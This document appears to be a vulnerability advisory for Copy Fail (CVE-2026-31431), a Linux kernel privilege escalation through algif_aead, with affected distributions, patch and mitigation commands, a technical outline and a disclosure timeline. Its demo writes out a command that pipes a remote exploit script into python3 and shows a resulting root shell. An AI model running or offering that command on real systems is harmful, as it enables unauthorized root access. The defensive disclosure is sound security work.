Copy Fail: Critical Linux Kernel Exploit CVE-2026-31431
Copy Fail: The Silent Linux Kernel Killer (CVE-2026-31431)
A single 732-byte Python script. Four major Linux distributions. Four root shells β no modifications, no recompilation, no fuss. Welcome to Copy Fail (CVE-2026-31431), the most portable local privilege escalation in recent Linux history.
The Exploit That Works Everywhere
Discovered through AI-assisted auditing by Xint Code, Copy Fail exploits a 2017 kernel optimization in the algif_aead crypto interface. Unprivileged users can write 4 controlled bytes directly into the page cache of any readable file β including setuid-root binaries like /usr/bin/su.
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
One take. 100% reliable. Every distro.
Who Needs to Panic (Patch Order)
| Priority | Environment | Risk |
|---|---|---|
| π₯ High | Multi-tenant hosts, Kubernetes, CI runners | Any user β host root |
| π₯ High | Cloud SaaS, notebook hosts | Tenant escape to host |
| π¨ Medium | Single-tenant servers | Internal LPE chain |
| π’ Lower | Single-user workstations | Post-exploitation only |
Verified affected: Ubuntu 24.04, Amazon Linux 2023, RHEL 10, SUSE 16 (and counting).
What Makes Copy Fail Different
| Property | Typical LPE | Copy Fail |
|---|---|---|
| Race condition | β Required | β None |
| Per-distro offsets | β Required | β Universal |
| Reliability | 30-80% | β 100% single-shot |
| Affected window | Narrow range | 2017 β 2026 (9 years) |
| Container escape | β Host-only | β Cross-tenant |
Unlike Dirty Pipe (pipe flags) or Dirty Cow (race conditions), Copy Fail is straight-line code abusing AEAD scatterlist mishandling.
Immediate Mitigation
1. Patch (Primary)
# Update kernel to include mainline commit a664bf3d603d
apt update && apt upgrade linux-image-generic # Ubuntu
yum update kernel # RHEL
zypper update kernel # SUSE
2. Emergency Disable (Pre-patch)
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
Performance impact: None for 99.9% of workloads. Only affects rare AF_ALG users.
3. Container Hardening
Block AF_ALG sockets via seccomp for untrusted workloads.
Technical Deep Dive
The vulnerability lives in algif_aead (AF_ALG socket family). A 2017 'optimization' allowed in-place crypto where page-cache pages (read-only source) became the writable destination scatterlist.
splice()feeds page-cache pages into crypto scatterlist- AEAD authentication scribbles 4 AAD ESN bytes past buffer bounds
authenc_esnnever restores the overwritten page-cache bytesexecve(/usr/bin/su)reads corrupted page-cache β root shell
Stealth bonus: No VFS writes, no dirty pages, no disk changes. Evict cache or reboot β clean file.
Disclosure Timeline
- 2026-03-23: Reported to kernel team
- 2026-04-01: Patch committed
- 2026-04-29: Public disclosure
Defend Responsibly
The PoC is public (sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9) for defenders to test patches. Only run on authorized systems.
Multi-tenant operators: Patch yesterday. This isn't theoretical.
Found by Xint Code β AI security auditing that actually works.